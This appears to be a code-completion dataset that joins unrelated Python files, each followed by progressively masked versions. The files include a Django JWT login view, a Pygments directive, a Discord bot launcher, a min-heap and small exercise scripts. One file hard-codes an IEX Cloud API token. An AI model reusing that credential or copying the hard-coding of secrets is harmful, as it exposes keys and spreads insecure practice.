None\r\n if with_refresh_token:\r\n refresh_expiry = now + timedelta(days=float(os.environ['JWT_REFRESH_DAYS']))\r\n refresh_token = generate_jwt({'user_id': user_id, 'refresh': True}, refresh_expiry)\r\n return token, refresh_token\r\n\r\n def post(self, request):\r\n\r\n username = request.data.get(\"username\")\r\n password = request.data.get(\"password\")\r\n try:\r\n user = User.objects.get(username=username)\r\n except User.DoesNotExist as e:\r\n return StatusResponse(http_code=400,data={\"tip\": \"用户不存在\"})\r\n\r\n if user is not None and user.check_password(password):\r\n token, refresh_token = self._generate_tokens(user.id, with_refresh_token=True)\r\n data = {\r\n \"token\": token,\r\n \"refresh_token\": refresh_token,\r\n \"id\": user.id,\r\n \"username\": user.username\r\n }\r\n response = StatusResponse(data=data, http_code=201)\r\n return response\r\n return StatusResponse(http_code=400,data={\"tip\":\"登录失败\"})\r\n def put(self,request):\r\n if request.user_id and request.refresh:\r\n token,refresh_token = self._generate_tokens(request.user_id, with_refresh_token=False)\r\n data ={\r\n \"id\":request.user_id,\r\n \"token\":token\r\n }\r\n response = StatusResponse(data=data, http_code=201)\r\n return response\r\n else:\r\n return StatusResponse(http_code=401, data={\"tip\": \"token刷新失败\"})\r\n\r\nclass UserRegistView(GenericAPIView):\r\n serializer_class = UserSerializer\r\n def post(self, request):\r\n serializer = self.get_serializer(data=request.data)\r\n serializer.is_valid(raise_exception=True)\r\n serializer.save()\r\n return StatusResponse(http_code=200,data=serializer.data)\r\n",
"step-ids": [
7,
8,
10,
11,
13
]
}
|
[
7,
8,
10,
11,
13
] |
from docutils import nodes
from docutils.parsers.rst import directives, Directive
from pygments import highlight
from pygments.lexers import get_lexer_by_name
from pygments.lexers.special import TextLexer
from pygments.formatters.html import HtmlFormatter
class Pygments(Directive):
""" Source code syntax hightlighting.
"""
required_arguments = 1
optional_arguments = 0
final_argument_whitespace = True
option_spec = {
'anchorlinenos': directives.flag,
'classprefix': directives.unchanged,
'hl_lines': directives.unchanged,
'lineanchors': directives.unchanged,
'linenos': directives.unchanged,
'linenospecial': directives.nonnegative_int,
'linenostart': directives.nonnegative_int,
'linenostep': directives.nonnegative_int,
'lineseparator': directives.unchanged,
'linespans': directives.unchanged,
'nobackground': directives.flag,
'nowrap': directives.flag,
'tagsfile': directives.unchanged,
'tagurlformat': directives.unchanged,
}
has_content = True
def run(self):
self.assert_has_content()
try:
lexer = get_lexer_by_name(self.arguments[0])
except ValueError:
# no lexer found - use the text one instead of an exception
lexer = TextLexer()
if 'linenos' in self.options and self.options['linenos'] not in ('table', 'inline'):
if self.options['linenos'] == 'none':
self.options.pop('linenos')
else:
self.options['linenos'] = 'table'
for flag in ('nowrap', 'nobackground', 'anchorlinenos'):
if flag in self.options:
self.options[flag] = True
# noclasses should already default to False, but just in case...
formatter = HtmlFormatter(noclasses=False, **self.options)
parsed = highlight('\n'.join(self.content), lexer, formatter)
return [nodes.raw('', parsed, format='html')]
def register():
directives.register_directive('code-block', Pygments)
directives.register_directive('sourcecode', Pygments)
|
normal
|
{
"blob_id": "d3dcef6a1a6bcfc1161c4de46081703b8fe7016d",
"index": 9606,
"step-1": "<mask token>\n\n\nclass Pygments(Directive):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def run(self):\n self.assert_has_content()\n try:\n lexer = get_lexer_by_name(self.arguments[0])\n except ValueError:\n lexer = TextLexer()\n if 'linenos' in self.options and self.options['linenos'] not in (\n 'table', 'inline'):\n if self.options['linenos'] == 'none':\n self.options.pop('linenos')\n else:\n self.options['linenos'] = 'table'\n for flag in ('nowrap', 'nobackground', 'anchorlinenos'):\n if flag in self.options:\n self.options[flag] = True\n formatter = HtmlFormatter(noclasses=False, **self.options)\n parsed = highlight('\\n'.join(self.content), lexer, formatter)\n return [nodes.raw('', parsed, format='html')]\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Pygments(Directive):\n \"\"\" Source code syntax hightlighting.\n \"\"\"\n required_arguments = 1\n optional_arguments = 0\n final_argument_whitespace = True\n option_spec = {'anchorlinenos': directives.flag, 'classprefix':\n directives.unchanged, 'hl_lines': directives.unchanged,\n 'lineanchors': directives.unchanged, 'linenos': directives.\n unchanged, 'linenospecial': directives.nonnegative_int,\n 'linenostart': directives.nonnegative_int, 'linenostep': directives\n .nonnegative_int, 'lineseparator': directives.unchanged,\n 'linespans': directives.unchanged, 'nobackground': directives.flag,\n 'nowrap': directives.flag, 'tagsfile': directives.unchanged,\n 'tagurlformat': directives.unchanged}\n has_content = True\n\n def run(self):\n self.assert_has_content()\n try:\n lexer = get_lexer_by_name(self.arguments[0])\n except ValueError:\n lexer = TextLexer()\n if 'linenos' in self.options and self.options['linenos'] not in (\n 'table', 'inline'):\n if self.options['linenos'] == 'none':\n self.options.pop('linenos')\n else:\n self.options['linenos'] = 'table'\n for flag in ('nowrap', 'nobackground', 'anchorlinenos'):\n if flag in self.options:\n self.options[flag] = True\n formatter = HtmlFormatter(noclasses=False, **self.options)\n parsed = highlight('\\n'.join(self.content), lexer, formatter)\n return [nodes.raw('', parsed, format='html')]\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass Pygments(Directive):\n \"\"\" Source code syntax hightlighting.\n \"\"\"\n required_arguments = 1\n optional_arguments = 0\n final_argument_whitespace = True\n option_spec = {'anchorlinenos': directives.flag, 'classprefix':\n directives.unchanged, 'hl_lines': directives.unchanged,\n 'lineanchors': directives.unchanged, 'linenos': directives.\n unchanged, 'linenospecial': directives.nonnegative_int,\n 'linenostart': directives.nonnegative_int, 'linenostep': directives\n .nonnegative_int, 'lineseparator': directives.unchanged,\n 'linespans': directives.unchanged, 'nobackground': directives.flag,\n 'nowrap': directives.flag, 'tagsfile': directives.unchanged,\n 'tagurlformat': directives.unchanged}\n has_content = True\n\n def run(self):\n self.assert_has_content()\n try:\n lexer = get_lexer_by_name(self.arguments[0])\n except ValueError:\n lexer = TextLexer()\n if 'linenos' in self.options and self.options['linenos'] not in (\n 'table', 'inline'):\n if self.options['linenos'] == 'none':\n self.options.pop('linenos')\n else:\n self.options['linenos'] = 'table'\n for flag in ('nowrap', 'nobackground', 'anchorlinenos'):\n if flag in self.options:\n self.options[flag] = True\n formatter = HtmlFormatter(noclasses=False, **self.options)\n parsed = highlight('\\n'.join(self.content), lexer, formatter)\n return [nodes.raw('', parsed, format='html')]\n\n\ndef register():\n directives.register_directive('code-block', Pygments)\n directives.register_directive('sourcecode', Pygments)\n",
"step-4": "from docutils import nodes\nfrom docutils.parsers.rst import directives, Directive\nfrom pygments import highlight\nfrom pygments.lexers import get_lexer_by_name\nfrom pygments.lexers.special import TextLexer\nfrom pygments.formatters.html import HtmlFormatter\n\n\nclass Pygments(Directive):\n \"\"\" Source code syntax hightlighting.\n \"\"\"\n required_arguments = 1\n optional_arguments = 0\n final_argument_whitespace = True\n option_spec = {'anchorlinenos': directives.flag, 'classprefix':\n directives.unchanged, 'hl_lines': directives.unchanged,\n 'lineanchors': directives.unchanged, 'linenos': directives.\n unchanged, 'linenospecial': directives.nonnegative_int,\n 'linenostart': directives.nonnegative_int, 'linenostep': directives\n .nonnegative_int, 'lineseparator': directives.unchanged,\n 'linespans': directives.unchanged, 'nobackground': directives.flag,\n 'nowrap': directives.flag, 'tagsfile': directives.unchanged,\n 'tagurlformat': directives.unchanged}\n has_content = True\n\n def run(self):\n self.assert_has_content()\n try:\n lexer = get_lexer_by_name(self.arguments[0])\n except ValueError:\n lexer = TextLexer()\n if 'linenos' in self.options and self.options['linenos'] not in (\n 'table', 'inline'):\n if self.options['linenos'] == 'none':\n self.options.pop('linenos')\n else:\n self.options['linenos'] = 'table'\n for flag in ('nowrap', 'nobackground', 'anchorlinenos'):\n if flag in self.options:\n self.options[flag] = True\n formatter = HtmlFormatter(noclasses=False, **self.options)\n parsed = highlight('\\n'.join(self.content), lexer, formatter)\n return [nodes.raw('', parsed, format='html')]\n\n\ndef register():\n directives.register_directive('code-block', Pygments)\n directives.register_directive('sourcecode', Pygments)\n",
"step-5": "from docutils import nodes\nfrom docutils.parsers.rst import directives, Directive\n\nfrom pygments import highlight\nfrom pygments.lexers import get_lexer_by_name\nfrom pygments.lexers.special import TextLexer\nfrom pygments.formatters.html import HtmlFormatter\n\n\nclass Pygments(Directive):\n \"\"\" Source code syntax hightlighting.\n \"\"\"\n required_arguments = 1\n optional_arguments = 0\n final_argument_whitespace = True\n option_spec = {\n 'anchorlinenos': directives.flag,\n 'classprefix': directives.unchanged,\n 'hl_lines': directives.unchanged,\n 'lineanchors': directives.unchanged,\n 'linenos': directives.unchanged,\n 'linenospecial': directives.nonnegative_int,\n 'linenostart': directives.nonnegative_int,\n 'linenostep': directives.nonnegative_int,\n 'lineseparator': directives.unchanged,\n 'linespans': directives.unchanged,\n 'nobackground': directives.flag,\n 'nowrap': directives.flag,\n 'tagsfile': directives.unchanged,\n 'tagurlformat': directives.unchanged,\n }\n has_content = True\n\n def run(self):\n self.assert_has_content()\n try:\n lexer = get_lexer_by_name(self.arguments[0])\n except ValueError:\n # no lexer found - use the text one instead of an exception\n lexer = TextLexer()\n\n if 'linenos' in self.options and self.options['linenos'] not in ('table', 'inline'):\n if self.options['linenos'] == 'none':\n self.options.pop('linenos')\n else:\n self.options['linenos'] = 'table'\n\n for flag in ('nowrap', 'nobackground', 'anchorlinenos'):\n if flag in self.options:\n self.options[flag] = True\n\n # noclasses should already default to False, but just in case...\n formatter = HtmlFormatter(noclasses=False, **self.options)\n parsed = highlight('\\n'.join(self.content), lexer, formatter)\n return [nodes.raw('', parsed, format='html')]\n\n\ndef register():\n directives.register_directive('code-block', Pygments)\n directives.register_directive('sourcecode', Pygments)\n",
"step-ids": [
2,
4,
5,
6,
7
]
}
|
[
2,
4,
5,
6,
7
] |
IEX_CLOUD_API_TOKEN = 'Tpk_5d9dc536610243cda2c8ef4787d729b6'
|
normal
|
{
"blob_id": "86849d0e63cdb93a16497ca56ff9c64c15a60fa7",
"index": 4891,
"step-1": "<mask token>\n",
"step-2": "IEX_CLOUD_API_TOKEN = 'Tpk_5d9dc536610243cda2c8ef4787d729b6'\n",
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0,
1
]
}
|
[
0,
1
] |
#!/usr/bin/env python
# coding: utf-8
# In[2]:
print(" sum of n numbers with help of for loop. ")
n = 10
sum = 0
for num in range(0, n+1, 1):
sum = sum+num
print("Output: SUM of first ", n, "numbers is: ", sum )
# In[3]:
print(" sum of n numbers with help of while loop. ")
num = int(input("Enter the value of n: "))
hold = num
sum = 0
if num <= 0:
print("Enter a whole positive number!")
else:
while num > 0:
sum = sum + num
num = num - 1;
# displaying output
print("Sum of first", hold, "natural number is: ",sum)
# In[4]:
print("Take an integer and find whether the number is prime or not")
#input from user
number = int(input("Enter any number: "))
# prime number is always greater than 1
if number > 1:
for i in range(2, number):
if (number % i) == 0:
print(number, "is not a prime number")
break
else: print(number, "is a prime number")
# if the entered number is less than or equal to 1
# then it is not prime number
else: print(number, "is not a prime number")
# In[ ]:
|
normal
|
{
"blob_id": "d3c36ad36c50cd97f2101bc8df99d1961b0ad7ea",
"index": 4078,
"step-1": "<mask token>\n",
"step-2": "print(' sum of n numbers with help of for loop. ')\n<mask token>\nfor num in range(0, n + 1, 1):\n sum = sum + num\nprint('Output: SUM of first ', n, 'numbers is: ', sum)\nprint(' sum of n numbers with help of while loop. ')\n<mask token>\nif num <= 0:\n print('Enter a whole positive number!')\nelse:\n while num > 0:\n sum = sum + num\n num = num - 1\nprint('Sum of first', hold, 'natural number is: ', sum)\nprint('Take an integer and find whether the number is prime or not')\n<mask token>\nif number > 1:\n for i in range(2, number):\n if number % i == 0:\n print(number, 'is not a prime number')\n break\n else:\n print(number, 'is a prime number')\nelse:\n print(number, 'is not a prime number')\n",
"step-3": "print(' sum of n numbers with help of for loop. ')\nn = 10\nsum = 0\nfor num in range(0, n + 1, 1):\n sum = sum + num\nprint('Output: SUM of first ', n, 'numbers is: ', sum)\nprint(' sum of n numbers with help of while loop. ')\nnum = int(input('Enter the value of n: '))\nhold = num\nsum = 0\nif num <= 0:\n print('Enter a whole positive number!')\nelse:\n while num > 0:\n sum = sum + num\n num = num - 1\nprint('Sum of first', hold, 'natural number is: ', sum)\nprint('Take an integer and find whether the number is prime or not')\nnumber = int(input('Enter any number: '))\nif number > 1:\n for i in range(2, number):\n if number % i == 0:\n print(number, 'is not a prime number')\n break\n else:\n print(number, 'is a prime number')\nelse:\n print(number, 'is not a prime number')\n",
"step-4": "#!/usr/bin/env python\n# coding: utf-8\n\n# In[2]:\n\n\nprint(\" sum of n numbers with help of for loop. \")\nn = 10\nsum = 0\nfor num in range(0, n+1, 1):\n sum = sum+num\nprint(\"Output: SUM of first \", n, \"numbers is: \", sum )\n\n\n# In[3]:\n\n\nprint(\" sum of n numbers with help of while loop. \")\nnum = int(input(\"Enter the value of n: \"))\nhold = num \nsum = 0 \n\n\nif num <= 0: \n print(\"Enter a whole positive number!\") \nelse: \n while num > 0: \n sum = sum + num \n num = num - 1;\n # displaying output \nprint(\"Sum of first\", hold, \"natural number is: \",sum)\n\n\n# In[4]:\n\n\nprint(\"Take an integer and find whether the number is prime or not\")\n#input from user\nnumber = int(input(\"Enter any number: \")) \n# prime number is always greater than 1\nif number > 1: \n for i in range(2, number):\n if (number % i) == 0: \n print(number, \"is not a prime number\")\n break \n else: print(number, \"is a prime number\")\n # if the entered number is less than or equal to 1 \n # then it is not prime number \nelse: print(number, \"is not a prime number\")\n\n\n# In[ ]:\n\n\n\n\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
# Generated by Django 2.2.1 on 2019-05-23 14:07
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('presentes', '0015_caso_lugar_del_hecho'),
]
operations = [
migrations.AddField(
model_name='organizacion',
name='descripcion',
field=models.TextField(default=''),
),
migrations.AddField(
model_name='organizacion',
name='email',
field=models.CharField(default='', max_length=200),
),
]
|
normal
|
{
"blob_id": "5cd767564e8a261561e141abeebb5221cb3ef2c2",
"index": 6919,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('presentes', '0015_caso_lugar_del_hecho')]\n operations = [migrations.AddField(model_name='organizacion', name=\n 'descripcion', field=models.TextField(default='')), migrations.\n AddField(model_name='organizacion', name='email', field=models.\n CharField(default='', max_length=200))]\n",
"step-4": "from django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n dependencies = [('presentes', '0015_caso_lugar_del_hecho')]\n operations = [migrations.AddField(model_name='organizacion', name=\n 'descripcion', field=models.TextField(default='')), migrations.\n AddField(model_name='organizacion', name='email', field=models.\n CharField(default='', max_length=200))]\n",
"step-5": "# Generated by Django 2.2.1 on 2019-05-23 14:07\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('presentes', '0015_caso_lugar_del_hecho'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='organizacion',\n name='descripcion',\n field=models.TextField(default=''),\n ),\n migrations.AddField(\n model_name='organizacion',\n name='email',\n field=models.CharField(default='', max_length=200),\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
class MinHeap:
__heap = [-0]
def __init__(self):
pass
def insert(self, value):
self.__heap.append(value)
self.__sift_up()
def pop(self):
if len(self.__heap) == 1:
return None
minimum = self.__heap[1]
if len(self.__heap) == 2:
self.__heap.pop()
else:
self.__heap[1] = self.__heap.pop()
self.__sift_down()
return minimum
def __sift_up(self):
idx = len(self.__heap) - 1
parent = idx >> 1
while idx > 1 and self.__heap[idx] < self.__heap[parent]:
tmp = self.__heap[idx]
self.__heap[idx] = self.__heap[parent]
self.__heap[parent] = tmp
idx = parent
parent = idx >> 1
def __sift_down(self):
idx = 1
size = len(self.__heap)
while idx < size:
minimum = self.__heap[idx]
left = idx << 1
right = left + 1
swap = None
if left < size and self.__heap[left] < minimum:
minimum = self.__heap[left]
swap = left
if right < size and self.__heap[right] < minimum:
swap = right
if swap is None:
break
tmp = self.__heap[swap]
self.__heap[swap] = self.__heap[idx]
self.__heap[idx] = tmp
idx = swap
|
normal
|
{
"blob_id": "d412e5768b23b8bbb8f72e2ae204650bbc1f0550",
"index": 8979,
"step-1": "class MinHeap:\n <mask token>\n\n def __init__(self):\n pass\n\n def insert(self, value):\n self.__heap.append(value)\n self.__sift_up()\n\n def pop(self):\n if len(self.__heap) == 1:\n return None\n minimum = self.__heap[1]\n if len(self.__heap) == 2:\n self.__heap.pop()\n else:\n self.__heap[1] = self.__heap.pop()\n self.__sift_down()\n return minimum\n <mask token>\n <mask token>\n",
"step-2": "class MinHeap:\n <mask token>\n\n def __init__(self):\n pass\n\n def insert(self, value):\n self.__heap.append(value)\n self.__sift_up()\n\n def pop(self):\n if len(self.__heap) == 1:\n return None\n minimum = self.__heap[1]\n if len(self.__heap) == 2:\n self.__heap.pop()\n else:\n self.__heap[1] = self.__heap.pop()\n self.__sift_down()\n return minimum\n <mask token>\n\n def __sift_down(self):\n idx = 1\n size = len(self.__heap)\n while idx < size:\n minimum = self.__heap[idx]\n left = idx << 1\n right = left + 1\n swap = None\n if left < size and self.__heap[left] < minimum:\n minimum = self.__heap[left]\n swap = left\n if right < size and self.__heap[right] < minimum:\n swap = right\n if swap is None:\n break\n tmp = self.__heap[swap]\n self.__heap[swap] = self.__heap[idx]\n self.__heap[idx] = tmp\n idx = swap\n",
"step-3": "class MinHeap:\n <mask token>\n\n def __init__(self):\n pass\n\n def insert(self, value):\n self.__heap.append(value)\n self.__sift_up()\n\n def pop(self):\n if len(self.__heap) == 1:\n return None\n minimum = self.__heap[1]\n if len(self.__heap) == 2:\n self.__heap.pop()\n else:\n self.__heap[1] = self.__heap.pop()\n self.__sift_down()\n return minimum\n\n def __sift_up(self):\n idx = len(self.__heap) - 1\n parent = idx >> 1\n while idx > 1 and self.__heap[idx] < self.__heap[parent]:\n tmp = self.__heap[idx]\n self.__heap[idx] = self.__heap[parent]\n self.__heap[parent] = tmp\n idx = parent\n parent = idx >> 1\n\n def __sift_down(self):\n idx = 1\n size = len(self.__heap)\n while idx < size:\n minimum = self.__heap[idx]\n left = idx << 1\n right = left + 1\n swap = None\n if left < size and self.__heap[left] < minimum:\n minimum = self.__heap[left]\n swap = left\n if right < size and self.__heap[right] < minimum:\n swap = right\n if swap is None:\n break\n tmp = self.__heap[swap]\n self.__heap[swap] = self.__heap[idx]\n self.__heap[idx] = tmp\n idx = swap\n",
"step-4": "class MinHeap:\n __heap = [-0]\n\n def __init__(self):\n pass\n\n def insert(self, value):\n self.__heap.append(value)\n self.__sift_up()\n\n def pop(self):\n if len(self.__heap) == 1:\n return None\n minimum = self.__heap[1]\n if len(self.__heap) == 2:\n self.__heap.pop()\n else:\n self.__heap[1] = self.__heap.pop()\n self.__sift_down()\n return minimum\n\n def __sift_up(self):\n idx = len(self.__heap) - 1\n parent = idx >> 1\n while idx > 1 and self.__heap[idx] < self.__heap[parent]:\n tmp = self.__heap[idx]\n self.__heap[idx] = self.__heap[parent]\n self.__heap[parent] = tmp\n idx = parent\n parent = idx >> 1\n\n def __sift_down(self):\n idx = 1\n size = len(self.__heap)\n while idx < size:\n minimum = self.__heap[idx]\n left = idx << 1\n right = left + 1\n swap = None\n if left < size and self.__heap[left] < minimum:\n minimum = self.__heap[left]\n swap = left\n if right < size and self.__heap[right] < minimum:\n swap = right\n if swap is None:\n break\n tmp = self.__heap[swap]\n self.__heap[swap] = self.__heap[idx]\n self.__heap[idx] = tmp\n idx = swap\n",
"step-5": null,
"step-ids": [
4,
5,
6,
7
]
}
|
[
4,
5,
6,
7
] |
# BotSetup.py
from websockets.exceptions import InvalidStatusCode
from dokbot.DokBotCog import DokBotCog
from events.EventCog import EventCog
from dotenv import load_dotenv
from datetime import datetime
from .DokBot import DokBot
import utils.Logger as Log
import logging
import os
import sys
import traceback
import discord
def run() -> None:
os.environ['TZ'] = 'Europe/Brussels'
if sys.platform != 'win32':
from time import tzset
tzset()
print(datetime.now())
load_dotenv()
Log.setup()
token = os.getenv('DISCORD_BOT_TOKEN')
assert token, "Could not find any dokbot bot token"
intents = discord.Intents.default()
intents.members = True
prefix = '>' if os.getenv('APP_ENV') == 'development' else '!'
bot = DokBot(command_prefix=prefix, intents=intents)
bot.add_cog(DokBotCog(bot))
bot.add_cog(EventCog(bot))
@bot.event
async def on_ready():
logging.getLogger().info(f'{bot.user.name} has connected.')
#
# @discord_client.event
# async def on_message(message: discord.Message) -> None:
# if not discord_client.is_ready() or message.author == discord_client.user:
# return
# try:
# await command_runner.run_command_for_message(message)
# except Exception as ex:
# await handle_exception(ex, author=message.author, content=message.content)
#
# @discord_client.event
# async def on_raw_reaction_add(reaction_event: discord.RawReactionActionEvent) -> None:
# if not discord_client.is_ready() or reaction_event.user_id == discord_client.user.id or reaction_event.emoji.name not in EMOJI_SIGNUP_STATUS.keys():
# return
# try:
# await signup_character(client=discord_client, reaction_event=reaction_event)
# except Exception as ex:
# user = await discord_client.fetch_user(reaction_event.user_id)
# await handle_exception(ex, author=user, content="Raid signup failed")
#
# async def handle_exception(ex: Exception, author: discord.User, content: str) -> None:
# Log.error(f"{author}, {content}, {ex}\n{traceback.format_exc()}")
# if isinstance(ex, BotException) and not isinstance(ex, InternalBotException):
# await author.send(ex.message)
# else:
# global maintainer
# if maintainer is None:
# maintainer = await discord_client.fetch_user(MAINTAINER_ID)
# await author.send(f"There were internal difficulties. Sending a message to {maintainer.display_name}")
# await maintainer.send(f'{author.display_name}, {content}, {ex}')
#
try:
bot.run(token)
except InvalidStatusCode as e:
error_message = f"Could not start client {e}\n{traceback.format_exc()}"
Log.error(error_message)
|
normal
|
{
"blob_id": "a7123fa221555b15162dbab0d93a86965190b805",
"index": 4141,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef run() ->None:\n os.environ['TZ'] = 'Europe/Brussels'\n if sys.platform != 'win32':\n from time import tzset\n tzset()\n print(datetime.now())\n load_dotenv()\n Log.setup()\n token = os.getenv('DISCORD_BOT_TOKEN')\n assert token, 'Could not find any dokbot bot token'\n intents = discord.Intents.default()\n intents.members = True\n prefix = '>' if os.getenv('APP_ENV') == 'development' else '!'\n bot = DokBot(command_prefix=prefix, intents=intents)\n bot.add_cog(DokBotCog(bot))\n bot.add_cog(EventCog(bot))\n\n @bot.event\n async def on_ready():\n logging.getLogger().info(f'{bot.user.name} has connected.')\n try:\n bot.run(token)\n except InvalidStatusCode as e:\n error_message = f'Could not start client {e}\\n{traceback.format_exc()}'\n Log.error(error_message)\n",
"step-3": "from websockets.exceptions import InvalidStatusCode\nfrom dokbot.DokBotCog import DokBotCog\nfrom events.EventCog import EventCog\nfrom dotenv import load_dotenv\nfrom datetime import datetime\nfrom .DokBot import DokBot\nimport utils.Logger as Log\nimport logging\nimport os\nimport sys\nimport traceback\nimport discord\n\n\ndef run() ->None:\n os.environ['TZ'] = 'Europe/Brussels'\n if sys.platform != 'win32':\n from time import tzset\n tzset()\n print(datetime.now())\n load_dotenv()\n Log.setup()\n token = os.getenv('DISCORD_BOT_TOKEN')\n assert token, 'Could not find any dokbot bot token'\n intents = discord.Intents.default()\n intents.members = True\n prefix = '>' if os.getenv('APP_ENV') == 'development' else '!'\n bot = DokBot(command_prefix=prefix, intents=intents)\n bot.add_cog(DokBotCog(bot))\n bot.add_cog(EventCog(bot))\n\n @bot.event\n async def on_ready():\n logging.getLogger().info(f'{bot.user.name} has connected.')\n try:\n bot.run(token)\n except InvalidStatusCode as e:\n error_message = f'Could not start client {e}\\n{traceback.format_exc()}'\n Log.error(error_message)\n",
"step-4": "# BotSetup.py\nfrom websockets.exceptions import InvalidStatusCode\nfrom dokbot.DokBotCog import DokBotCog\nfrom events.EventCog import EventCog\nfrom dotenv import load_dotenv\nfrom datetime import datetime\nfrom .DokBot import DokBot\n\nimport utils.Logger as Log\nimport logging\nimport os\nimport sys\nimport traceback\nimport discord\n\n\ndef run() -> None:\n os.environ['TZ'] = 'Europe/Brussels'\n if sys.platform != 'win32':\n from time import tzset\n tzset()\n\n print(datetime.now())\n load_dotenv()\n Log.setup()\n\n token = os.getenv('DISCORD_BOT_TOKEN')\n assert token, \"Could not find any dokbot bot token\"\n\n intents = discord.Intents.default()\n intents.members = True\n\n prefix = '>' if os.getenv('APP_ENV') == 'development' else '!'\n bot = DokBot(command_prefix=prefix, intents=intents)\n bot.add_cog(DokBotCog(bot))\n bot.add_cog(EventCog(bot))\n\n @bot.event\n async def on_ready():\n logging.getLogger().info(f'{bot.user.name} has connected.')\n\n #\n # @discord_client.event\n # async def on_message(message: discord.Message) -> None:\n # if not discord_client.is_ready() or message.author == discord_client.user:\n # return\n # try:\n # await command_runner.run_command_for_message(message)\n # except Exception as ex:\n # await handle_exception(ex, author=message.author, content=message.content)\n #\n # @discord_client.event\n # async def on_raw_reaction_add(reaction_event: discord.RawReactionActionEvent) -> None:\n # if not discord_client.is_ready() or reaction_event.user_id == discord_client.user.id or reaction_event.emoji.name not in EMOJI_SIGNUP_STATUS.keys():\n # return\n # try:\n # await signup_character(client=discord_client, reaction_event=reaction_event)\n # except Exception as ex:\n # user = await discord_client.fetch_user(reaction_event.user_id)\n # await handle_exception(ex, author=user, content=\"Raid signup failed\")\n #\n # async def handle_exception(ex: Exception, author: discord.User, content: str) -> None:\n # Log.error(f\"{author}, {content}, {ex}\\n{traceback.format_exc()}\")\n # if isinstance(ex, BotException) and not isinstance(ex, InternalBotException):\n # await author.send(ex.message)\n # else:\n # global maintainer\n # if maintainer is None:\n # maintainer = await discord_client.fetch_user(MAINTAINER_ID)\n # await author.send(f\"There were internal difficulties. Sending a message to {maintainer.display_name}\")\n # await maintainer.send(f'{author.display_name}, {content}, {ex}')\n #\n try:\n bot.run(token)\n except InvalidStatusCode as e:\n error_message = f\"Could not start client {e}\\n{traceback.format_exc()}\"\n Log.error(error_message)\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
from text_to_word_cloud import *
from collections import Counter
from preprocess import *
if __name__ == '__main__':
data = load_data('train.json')
words = text_to_words(get_all_text(data), as_set=False)
cnt = Counter(words)
save_il_to_word_cloud_file("cloudofw.txt",cnt,len(words),call_R=True)
|
normal
|
{
"blob_id": "b3bba1119bfaf0c1e684e8835259ec6fa8c42cf7",
"index": 1838,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nif __name__ == '__main__':\n data = load_data('train.json')\n words = text_to_words(get_all_text(data), as_set=False)\n cnt = Counter(words)\n save_il_to_word_cloud_file('cloudofw.txt', cnt, len(words), call_R=True)\n",
"step-3": "from text_to_word_cloud import *\nfrom collections import Counter\nfrom preprocess import *\nif __name__ == '__main__':\n data = load_data('train.json')\n words = text_to_words(get_all_text(data), as_set=False)\n cnt = Counter(words)\n save_il_to_word_cloud_file('cloudofw.txt', cnt, len(words), call_R=True)\n",
"step-4": "from text_to_word_cloud import *\r\nfrom collections import Counter\r\nfrom preprocess import *\r\n\r\n\r\nif __name__ == '__main__':\r\n data = load_data('train.json')\r\n words = text_to_words(get_all_text(data), as_set=False)\r\n cnt = Counter(words)\r\n save_il_to_word_cloud_file(\"cloudofw.txt\",cnt,len(words),call_R=True)\r\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
import pandas as pd
import random
import string
import names
def generatetest(n=100, filename="test_data"):
ids = []
names_list = []
for _ in range(n):
ids.append(''.join(random.choices(
string.ascii_letters + string.digits, k=9)))
names_list.append(names.get_full_name())
df = pd.DataFrame({
'id': ids,
'names': names_list,
})
df.to_csv('tmp/{}.csv'.format(filename), index=False)
if __name__ == "__main__":
generatetest()
print("test set generated!")
|
normal
|
{
"blob_id": "aa913fd40a710cfd7288fd59c4039c4b6a5745cc",
"index": 4569,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef generatetest(n=100, filename='test_data'):\n ids = []\n names_list = []\n for _ in range(n):\n ids.append(''.join(random.choices(string.ascii_letters + string.\n digits, k=9)))\n names_list.append(names.get_full_name())\n df = pd.DataFrame({'id': ids, 'names': names_list})\n df.to_csv('tmp/{}.csv'.format(filename), index=False)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef generatetest(n=100, filename='test_data'):\n ids = []\n names_list = []\n for _ in range(n):\n ids.append(''.join(random.choices(string.ascii_letters + string.\n digits, k=9)))\n names_list.append(names.get_full_name())\n df = pd.DataFrame({'id': ids, 'names': names_list})\n df.to_csv('tmp/{}.csv'.format(filename), index=False)\n\n\nif __name__ == '__main__':\n generatetest()\n print('test set generated!')\n",
"step-4": "import pandas as pd\nimport random\nimport string\nimport names\n\n\ndef generatetest(n=100, filename='test_data'):\n ids = []\n names_list = []\n for _ in range(n):\n ids.append(''.join(random.choices(string.ascii_letters + string.\n digits, k=9)))\n names_list.append(names.get_full_name())\n df = pd.DataFrame({'id': ids, 'names': names_list})\n df.to_csv('tmp/{}.csv'.format(filename), index=False)\n\n\nif __name__ == '__main__':\n generatetest()\n print('test set generated!')\n",
"step-5": "import pandas as pd\nimport random\nimport string\nimport names\n\n\ndef generatetest(n=100, filename=\"test_data\"):\n ids = []\n names_list = []\n for _ in range(n):\n ids.append(''.join(random.choices(\n string.ascii_letters + string.digits, k=9)))\n names_list.append(names.get_full_name())\n\n df = pd.DataFrame({\n 'id': ids,\n 'names': names_list,\n })\n df.to_csv('tmp/{}.csv'.format(filename), index=False)\n\n\nif __name__ == \"__main__\":\n generatetest()\n print(\"test set generated!\")\n",
